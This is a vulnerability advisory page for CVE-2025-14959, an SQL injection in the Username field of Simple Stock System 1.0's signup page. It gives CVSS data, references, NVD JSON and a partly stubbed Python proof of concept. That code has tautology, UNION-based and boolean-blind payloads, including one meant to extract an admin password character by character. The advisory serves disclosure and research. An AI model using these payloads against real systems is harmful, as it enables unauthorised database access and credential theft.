CVE-2025-14959

Description

A weakness has been identified in code-projects Simple Stock System 1.0. This issue affects some unknown processing of the file /market/signup.php. Executing a manipulation of the argument Username can lead to sql injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:carmelo:simple_stock_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Simple Stock System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14959 SQL Injection PoC # Target: Simple Stock System 1.0 - /market/signup.php # Vulnerability: SQL Injection via Username parameter import requests import sys target_url = "http://target.com/market/signup.php" # Basic SQL Injection test - check for error-based injection def test_basic_injection(): payload = "' OR '1'='1" data = { "Username": payload, "Email": "[email protected]", "Password": "password123", "submit": "Register" } response = requests.post(target_url, data=data) return response.text # UNION-based injection to extract database info def union_injection(): # Determine number of columns for i in range(1, 10): payload = f"' UNION SELECT {'NULL,' * (i-1)} NULL-- -" data = {"Username": payload, "Email": "[email protected]", "Password": "pass", "submit": "Register"} # Test and identify column count pass # Extract database version, user, and database name def extract_db_info(): payload = "' UNION SELECT 1,2,@@version,4,5-- -" data = {"Username": payload, "Email": "[email protected]", "Password": "pass", "submit": "Register"} # Parse response for DB info pass # Boolean-based blind injection for data extraction def blind_injection(): # Example: Extract admin password character by character charset = "abcdefghijklmnopqrstuvwxyz0123456789" password = "" for pos in range(1, 33): for char in charset: payload = f"' AND SUBSTRING((SELECT password FROM users LIMIT 1),{pos},1)='{char}-- -" data = {"Username": payload, "Email": "[email protected]", "Password": "pass", "submit": "Register"} # Check response for true/false condition pass return password if __name__ == "__main__": print("Testing CVE-2025-14959 SQL Injection...") test_basic_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14959
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14959
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14959/
[4] VulDB https://vuldb.com/cve/CVE-2025-14959
[5] https://code-projects.org/
[6] https://github.com/InorSogeih/Inor/issues/1
[7] https://vuldb.com/?ctiid.337595
[8] https://vuldb.com/?id.337595
[9] https://vuldb.com/?submit.717344
[10] https://github.com/InorSogeih/Inor/issues/1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14959", "sourceIdentifier": "[email protected]", "published": "2025-12-19T18:15:48.580", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in code-projects Simple Stock System 1.0. This issue affects some unknown processing of the file /market/signup.php. Executing a manipulation of the argument Username can lead to sql injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:simple_stock_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2A63A1F8-39AA-4637-B265-651E4E38EF45"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/InorSogeih/Inor/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.337595", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337595", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.717344", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/InorSogeih/Inor/issues/1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}